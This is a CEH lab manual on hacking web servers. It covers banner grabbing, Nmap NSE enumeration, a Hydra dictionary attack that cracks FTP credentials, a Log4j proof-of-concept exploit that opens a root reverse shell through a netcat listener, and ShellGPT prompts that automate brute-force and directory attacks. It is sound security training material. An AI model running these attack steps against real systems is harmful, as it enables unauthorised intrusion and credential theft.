Module 13 Hacking Web Servers

Lab 1: Footprint the Web Server

Lab Scenario

The first step of hacking web servers for a professional ethical hacker or pen tester is to collect
as much information as possible about the target web server and analyze the collected
information in order to find lapses in its current security mechanisms. The main purpose is to
learn about the web server's remote access capabilities, its ports and services, and other
aspects of its security.

The information obtained in this step helps in assessing the security posture of the web server.
Footprinting may involve searching the Internet, newsgroups, bulletin boards, etc. for gathering
information about the target organization's web server. There are also tools such as Whois.net
and Whois Lookup that extract information such as the target's domain name, IP address, and
autonomous system number.

Web server fingerprinting is an essential task for any penetration tester. Before proceeding to
hack or exploit a webserver, the penetration tester must know the type and version of the
webserver as most of the attacks and exploits are specific to the type and version of the server
being used by the target. These methods help any penetration tester to gain information and
analyze their target so that they can perform a thorough test and can deploy appropriate
methods to mitigate such attacks on the server.

An ethical hacker or penetration tester must perform footprinting to detect the loopholes in the
web server of the target organization. This will help in predicting the effectiveness of additional
security measures for strengthening and protecting the web server of the target organization.

The labs in this exercise demonstrate how to footprint a web server using various footprinting
tools and techniques.

Lab Objectives

• Footprint a web server using Netcat and Telnet

• Enumerate web server information using Nmap Scripting Engine (NSE)

Overview of Web Server Footprinting

By performing web server footprinting, it is possible to gather valuable system-level data such as
account details, OS, software versions, server names, and database schema details. Use Telnet
utility to footprint a web server and gather information such as server name, server type, OSes,
and applications running. Use footprinting tools such as Netcraft, ID Serve, and httprecon to
perform web server footprinting. Web server footprinting tools such as Netcraft, ID Serve, and
httprecon can extract information from the target server. Let us look at the features and the types
of information these tools can collect from the target server.

Task 1: Footprint a Web Server using Netcat and Telnet

Netcat

Netcat is a networking utility that reads and writes data across network connections, using the
TCP/IP protocol. It is a reliable "back-end" tool used directly or driven by other programs and
scripts. It is also a network debugging and exploration tool.

Telnet

Telnet is a client-server network protocol. It is widely used on the Internet or LANs. It provides
the login session for a user on the Internet. The single terminal attached to another computer
emulates with Telnet. The primary security problems with Telnet are the following:

• It does not encrypt any data sent through the connection.

• It lacks an authentication scheme.

Telnet helps users perform banner-grabbing attacks. It probes HTTP servers to determine the
Server field in the HTTP response header.

1. Click Parrot Security to switch to the Parrot Security machine.

2. In the Parrot Security machine, open a Terminal window and execute sudo
su to run the programs as a root user (When prompted, enter the
password toor).

3. In the terminal window, run nc -vv www.moviescope.com 80.

4. Once you hit Enter, the netcat will display the hosting information of the
provided domain.

5. Now, type GET / HTTP/1.0 and press Enter twice.

6. Netcat will perform the banner grabbing and gather information such as content
type, last modified date, accept ranges, ETag, and server information.
7. In the terminal windows, run clear to clear the netcat result in the terminal
window.
8. Now, perform banner grabbing using telnet. In the terminal window, run telnet
www.moviescope.com 80.
9. Telnet will connect to the domain.

10. Type GET / HTTP/1.0 and press Enter twice. Telnet will perform the banner
grabbing and gather information such as content type, last modified date, accept
ranges, ETag, and server information.
 11. This concludes the demonstration of how to gather information about the target
web server using the Netcat and Telnet utilities.

12. Close the terminal window on the Parrot Security machine.

Question 13.1.1.1

Perform banner grabbing using Telnet on the website www.moviescope.com. Identify the web-
server application used to host the website.

Task 2: Enumerate Web Server Information using Nmap

Scripting Engine (NSE)
The web applications that are available on the Internet may have vulnerabilities. Some hackers'
attack strategies may need the Administrator role on your server, but sometimes they simply
need sensitive information about the server. Utilizing Nmap and http-enum.nse content returns a
diagram of those applications, registries, and records uncovered. This way, it is possible to check
for vulnerabilities or abuses in databases. Through this technique, it is possible to discover
genuine (and extremely dumb) security imperfections on a site such as some sites (like
WordPress and PrestaShop) that maintain accessibility to envelopes that ought to be erased
once the task has been settled. Once you have identified a vulnerability, you can discover a fix
for it.

Nmap, along with Nmap Scripting Engine, can extract a lot of valuable information from the target
web server. In addition to Nmap commands, Nmap Scripting Engine (NSE)provides scripts that
reveal various useful information about the target web server to an attacker.

1. In the Parrot Security machine, open a Terminal window and execute sudo
su to run the programs as a root user (When prompted, enter the
password toor).

2. Enumerate the directories used by web servers and web applications, in the
terminal window. Run nmap -sV --script=http-enum [target website].

3. In this scan, we are enumerating the www.goodshopping.com website.

4. This script enumerates and provides you with the output details, as shown in the
screenshot.
5. The next step is to discover the hostnames that resolve the targeted domain.

6. In the terminal window, run nmap --script hostmap-bfk -script-args hostmap-

bfk.prefix=hostmap- www.goodshopping.com.
7. Perform an HTTP trace on the targeted domain. In the terminal window,
run nmap --script http-trace -d www.goodshopping.com.

8. This script will detect a vulnerable server that uses the TRACE method by
sending an HTTP TRACE request that shows if the method is enabled or not.
9. Now, check whether Web Application Firewall is configured on the target host or
domain. In the terminal window, run nmap -p80 --script http-waf-detect
www.goodshopping.com.

10. This command will scan the host and attempt to determine whether a web server
is being monitored by an IPS, IDS, or WAF.

11. This command will probe the target host with malicious payloads and detect the
changes in the response code.
 12. This concludes the demonstration of how to enumerate web server information
using the Nmap Scripting Engine (NSE).

13. Close the terminal windows on the Parrot Security machine.

Question 13.1.2.1

Use Nmap Scripting Engine (NSE) to extract information about the website
www.goodshopping.com. Enter the port number of the ms-wbt-server service, which is open on
the web server.

Question 13.1.2.2

Use Nmap Scripting Engine (NSE) to check whether a web-application firewall is configured for
the website www.goodshopping.com. Enter YES if a web-application firewall is configured for
www.goodshopping.com or NO otherwise.
Lab 2: Perform a Web Server Attack
Lab Scenario

After gathering required information about the target web server, the next task for an ethical
hacker or pen tester is to attack the web server in order to test the target network's web server
security infrastructure. This requires knowledge of how to perform web server attacks.

Attackers perform web server attacks with certain goals in mind. These goals may be technical or
non-technical. For example, attackers may breach the security of the web server to steal
sensitive information for financial gain, or merely for curiosity's sake. The attacker tries all
possible techniques to extract the necessary passwords, including password guessing, dictionary
attacks, brute force attacks, hybrid attacks, pre-computed hashes, rule-based attacks, distributed
network attacks, and rainbow attacks. The attacker needs patience, as some of these techniques
are tedious and time-consuming. The attacker can also use automated tools such as Brutus and
THC-Hydra, to crack web passwords.

An ethical hacker or pen tester must test the company's web server against various attacks and
other vulnerabilities. It is important to find various ways to extend the security test by analyzing
web servers and employing multiple testing techniques. This will help to predict the effectiveness
of additional security measures for strengthening and protecting web servers of the organization.

Lab Objectives

• Crack FTP credentials using a Dictionary Attack

• Gain Access to Target Web Server by Exploiting Log4j Vulnerability

Overview of Web Server Attack

Attackers can cause various kinds of damage to an organization by attacking a web server,
including:

• Compromise of a user account

• Secondary attacks from the website and website defacement
• Root access to other applications or servers
• Data tampering and data theft
• Damage to the company's reputation

Task 1: Crack FTP Credentials using a Dictionary Attack

A dictionary or wordlist contains thousands of words that are used by password cracking tools to
break into a password-protected system. An attacker may either manually crack a password by
guessing it or use automated tools and techniques such as the dictionary method. Most
password cracking techniques are successful, because of weak or easily guessable passwords.

First, find the open FTP port using Nmap, and then perform a dictionary attack using the THC
Hydra tool.
1. Click Parrot Security to switch to the Parrot Security machine.

Here, we will use a sample password file (Passwords.txt) containing a list of

passwords to crack the FTP credentials on the target machine.

2. Assume that you are an attacker, and you have observed that the FTP service is
running on the Windows 11 machine.

3. Perform an Nmap scan on the target machine (Windows 11) to check if the
FTP port is open.

4. In the Parrot Security machine, open a Terminal window and execute sudo
su to run the programs as a root user (When prompted, enter the
password toor).

5. In the terminal window, run nmap -p 21 [IP Address of Windows 11].

Here, the IP address of Windows 11 is 10.10.1.11.

6. Observe that port 21 is open in Windows 11.

7. Check if an FTP server is hosted on the Windows 11 machine.

8. Run ftp [IP Address of Windows 11]. You will be prompted to enter user
credentials. The need for credentials implies that an FTP server is hosted on the
machine.

9. Try entering random usernames and passwords in an attempt to gain FTP

access.

The password you enter will not be visible on the screen.

10. As shown in the screenshot, you will not be able to log in to the FTP server.
Close the terminal window.
11. Now, to attempt to gain access to the FTP server, perform a dictionary attack
using the THC Hydra tool.

12. Click Places from the top-section of the Desktop and click Desktop from the
drop-down options.
13. Navigate to CEHv13 Module 13 Hacking Web Servers folder and
copy Wordlists folder.

Press Ctrl+C to copy the folder.

14. Paste the copied folder (Wordlists) on the Desktop. Close the window

Press Ctrl+V to paste the folder.

15. In the Parrot Security machine, open a Terminal window and execute sudo
su to run the programs as a root user (When prompted, enter the
password toor).

16. In the terminal window, run hydra -L

/home/attacker/Desktop/Wordlists/Usernames.txt -P
/home/attacker/Desktop/Wordlists/Passwords.txt ftp://[IP Address of
Windows 11].

The IP address of Windows 11 in this lab exercise is 10.10.1.11. This IP

address might vary in your lab environment.
17. Hydra tries various combinations of usernames and passwords (present in
the Usernames.txt and Passwords.txt files) on the FTP server and outputs
cracked usernames and passwords.

This might take some time to complete.

18. On completion of the password cracking, the cracked credentials appear, as

shown in the screenshot.
19. Try to log in to the FTP server using one of the cracked username and password
combinations. In this lab, use Martin's credentials to gain access to the server.

20. In the terminal window, run ftp [IP Address of Windows 11].

21. Enter Martin's user credentials (Martin and apple) to check whether you can
successfully log in to the server.

22. On entering the credentials, you will successfully be able to log in to the server.
An ftp terminal appears, as shown in the screenshot.
23. Now, you can remotely access the FTP server hosted on the Windows
11 machine.

24. Run mkdir Hacked to remotely create a directory named Hacked on

the Windows 11 machine through the ftp terminal.
25. Click Windows 11 to switch to the Windows 11 machine and navigate
to C:\FTP.

26. View the directory named Hacked, as shown in the screenshot:

27. You have successfully gained remote access to the FTP server by obtaining the
appropriate credentials.

28. Click Parrot Security to switch back to the Parrot Security machine.

29. Enter help to view all other commands that you can use through the FTP
terminal.
30. On completing the task, enter quit to exit the ftp terminal.
 31. This concludes the demonstration of how to crack FTP credentials using a
dictionary attack and gain remote access to the FTP server.

32. Close all open windows on both the Parrot Security and Windows
11 machines.

Question 13.2.1.1

Perform a dictionary attack using the THC Hydra tool to remotely access the FTP server hosted
on the Windows 11 machine. Note: The wordlist file is located at CEHv13 Module 13 Hacking
Web Servers/Wordlists. Enter the password of the user Martin.

Question 13.2.1.2

Perform a dictionary attack using the THC Hydra tool to remotely access the FTP server hosted
on the Windows 11 machine. Enter the name of the user with the password “qwerty."
Task 2: Gain Access to Target Web Server by Exploiting
Log4j Vulnerability
Log4j is an open-source framework that helps developers store various types of logs produced
by users. Log4j which is also known as Log4shell and LogJam is a zero-day RCE (Remote Code
Execution) vulnerability, tracked under CVE-2021-44228. Log4j enables insecure JNDI lookups,
when these JNDI lookups are paired with the LDAP protocol, can be exploited to exfiltrate data or
execute arbitrary code.

Here, we will gain backdoor access by exploiting Log4j vulnerability.

Here, we will install a vulnerable server in the Ubuntu machine and use the Parrot
Security machine as the host machine to target the application.

1. Click Ubuntu to switch to the Ubuntu machine, and login

with Ubuntu/toor credentials.

2. In the left pane, under Activities list, scroll down and click the Terminal icon to
open the Terminal window.

3. Now, type sudo su and hit Enter to gain super-user access. Ubuntu will ask for
the password; type toor as the password and hit Enter.

4. First we need to install docker.io in ubuntu machine, to do that type sudo apt-
get update and press Enter.
5. Once the update is completed, type sudo apt-get install docker.io and
press Enter to install docker.

If a question appears Do you want to continue? type Y and press Enter.

If a Configuring docker.io window appears, select Yes and press Enter.
6. Once docker.io is successfully installed, type cd log4j-shell-poc/ and
press Enter to navigate to log4j-shell-poc directory.

7. Now, we need to setup log4j vulnerable server, to do that type docker build -t
log4j-shell-poc . and press Enter.

-t: specifies allocating a pseudo-tty.

8. Type docker run --network host log4j-shell-poc and press Enter, to start the
vulnerable server.
9. Leave the server running in the Ubuntu machine.

10. Click Parrot Security to switch to the Parrot Security machine.

11. We will first scan the target machine to identify any vulnerable services running
on it.

12. Open a Terminal window with superuser previleges and run nmap -sV -sC
10.10.1.9 command to view the running services.

-sV option enables version detection. This means Nmap will try to determine the
version of the services running on open ports. -sC option enables the use of
default scripts in the Nmap Scripting Engine (NSE). These scripts perform
various tasks like service detection, vulnerability detection, and more.
13. From the result we can see that port 8080 is open and Apache Tomcat/Coyote
1.1 server is running on the target system.

14. Upon investigation we can see that Apache is vulnerable to Remote Code
Execution (RCE) attack. Now we wil use searchsploit to find the vulnerabilities
pertaining to RCE attack on the target server.

15. In the terminal window run searchsploit -t Apache RCE command to view the
RCE vulnerabilities on the Apache server.
16. Now, we need to select a vulnerability to exploit the Server from the list, from the
Nmap scan we found that the Apache Tomcat server is running on JSP so we
will target java vulnerabilities from the list of vulnerabilities.

17. We can see that Java platform is vulnerable for Apache Log4j 2 - Remote
Command Execution (RCE) exploit.
18. We will now exploit Log4j vulnerability present in the target Web Server to
perform Remote code execution.

19. Click the Firefox icon at the top of Desktop, to open a browser window.

20. In the address bar of the browser, type http://10.10.1.9:8080 and press Enter.
21. As we can observe that the Log4j vulnerable server is running on
the Ubuntu machine, leave the Firefox and website open.

22. Switch to the Terminal window, run cd log4j-shell-poc/ and press Enter, to
enter into log4j-shell-poc directory.
23. Now, we needed to install JDK 8, to do that open a new terminal window and
type sudo su and press Enter to run the programs as a root user.

In the [sudo] password for attacker field, type toor as a password and
press Enter.

24. We need to extract JDK zip file which is already placed

at /home/attacker location.

25. Type tar -xf jdk-8u202-linux-x64.tar.gz and press Enter, to extract the file.

-xf: specifies extract all files.

26. Now we will move the jdk1.8.0_202 into /usr/bin/. To do that, type mv
jdk1.8.0_202 /usr/bin/ and press Enter.
27. Now, we need to update the installed JDK path in the poc.py file.

28. Navigate to the previous terminal window. In the terminal, type pluma
poc.py and press Enter to open poc.py file.
29. In the poc.py file scroll down and in line 62,
replace jdk1.8.0_20/bin/javac with /usr/bin/jdk1.8.0_202/bin/javac.
30. Scroll down to line 87 and
replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.
31. Scroll down to line 99 and
replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.
32. After making all the changes save the changes and close the poc.py editor
window.

33. Now, open a new terminal window and type nc -lvp 9001 and press Enter, to
initiate a netcat listener as shown in screenshot.
34. Switch to previous terminal window and type python3 poc.py --userip
10.10.1.13 --webport 8000 --lport 9001 and press Enter, to start the
exploitation and create payload.
35. Now, copy the payload generated in the send me: section.
36. Switch to Firefox browser window, in Username field paste the payload that
was copied in previous step and in Password field type password and
press Login button as shown in the screenshot.

In the Password field you can enter any password.

37. Now switch to the netcat listener, you can see that a reverse shell is opened.
38. In the listener window type pwd and press Enter, to view the present working
directory.
39. Now, type whoami and press Enter.
 40. We can see that we have shell access to the target web application as a root
user.

41. The Log4j vulnerability takes the payload as input and processes it, as a result
we will obtain a reverse shell.

42. This concludes the demonstration of how to gain backdoor access exploiting
Log4j vulnerability.

43. Close all open windows and document all acquired information.

Question 13.2.2.1

Install Apache Tomcat web server on Ubuntu machine and use Parrot Security machine to scan
for web server and exploit log4j vulnerability present in the Apache Tomcat on Ubuntu machine
to gain access to the vulnerable server. Determine the http-server-header that was found during
nmap scan on 10.10.1.9.
Lab 3: Perform a Web Server Hacking using AI
Lab Scenario

The objective of this lab is to simulate the process of hacking a web server using AI-driven
tools and techniques. This exercise will involve footprinting, fingerprinting, and exploiting
vulnerabilities to understand the security posture of the target web server.

Lab Objectives

• Perform Web Server Footprinting and Attacks using ShellGPT

Overview of Web Server Hacking using AI

In the realm of cybersecurity, the role of artificial intelligence (AI) has become increasingly
significant, especially in the domain of ethical hacking. AI-powered tools and techniques
provide ethical hackers with enhanced capabilities to discover vulnerabilities, automate
attacks, and strengthen defenses. Web server hacking, a critical aspect of penetration testing,
leverages AI to perform footprinting, fingerprinting, and exploitation more efficiently and
effectively.

Task 1: Perform Web Server Footprinting and Attacks

using ShellGPT
Web server footprinting and subsequent attacks are critical steps in penetration testing or
ethical hacking to assess the security posture of a target organization. ShellGPT, an AI-driven
tool, enhances these processes by automating information gathering, fingerprinting, and
vulnerability identification tasks.

Here we will use ShellGPT to perform Webserver footprinting and attacks using ShellGPT.

The commands generated by ShellGPT may vary depending on the prompt used and the tools
available on the machine. Due to these variables, the output generated by ShellGPT might
differ from what is shown in the screenshots. These differences arise from the dynamic nature
of the AI's processing and the diverse environments in which it operates. As a result, you may
observe differences in command syntax, execution, and results while performing this lab task.

1. Click Parrot Security to switch to Parrot machine, and login

with attacker/toor. Open a Terminal window and execute sudo su to run the
program as a root user (When prompted, enter the password toor).

The password that you type will not be visible.

2. Run bash sgpt.sh command to configure ShellGPT and the AI activation

key.
 You can follow the Instructions to Download your AI Activation
Key in Module 00: CEH Lab Setup to obtain the AI activation key.
Alternatively, follow the instructions available in the file, Instructions to
Download your AI_Activation_Key - CEHv13.

3. To perform directory traversal using ShellGPT, run **sgpt

4. --shell "Perform a directory traversal on target url https://certifiedhacker.com

using gobuster"** command.

In the prompt type E and press Enter to execute the command.

5. To perform FTP bruteforce attack run sgpt --shell "Attempt FTP login on
target IP 10.10.1.11 with hydra using usernames and passwords file from
/home/attacker/Wordlists" command.

In the prompt type E and press Enter to execute the command.

6. To perform webserver footprinting on target IP address using ShellGPT,
run sgpt --shell "Perform webserver footprinting on target IP
10.10.1.22" command.

In the prompt type E and press Enter to execute the command.

7. Run sgpt --shell "Perform web server footprinting on target IP 10.10.1.22
using Netcat by sending an HTTP request and analyzing the
response." command to perform web server footprinting using netcat.

In the prompt type E and press Enter to execute the command.

8. To perform website mirroring using ShellGPT, run sgpt --shell "Mirror the
target website certifiedhacker.com" command.

Alternatively you can use Httrack to mirror a target website, to do so run sgpt
--shell "Mirror the target website https://certifiedhacker.com with
httrack on desktop" command.
In the prompt type E and press Enter to execute the command.
9. To view the mirrored website navigate to Places -> Home Folder ->
certifiedhacker.com location and double-click on index.html file.
10. The mirrored certifiedhacker.com website opens up in Firefox browser.
 11. Apart from the aforementioned commands, you can further use ShellGPT
prompts to perform Web Server Hacking.

12. This concludes the demonstration of webserver footprinting and attacks using
ShellGPT.

13. Close all open windows and document all the acquired information.

Question 13.3.1.1

In Parrot Security machine, use ShellGPT to write and execute a prompt to perform directory
traversal attack on https://certifiedhacker.com website using gobuster. Enter the status code
of /docs directory of certifiedhacker.com that is displayed in the gobuster tool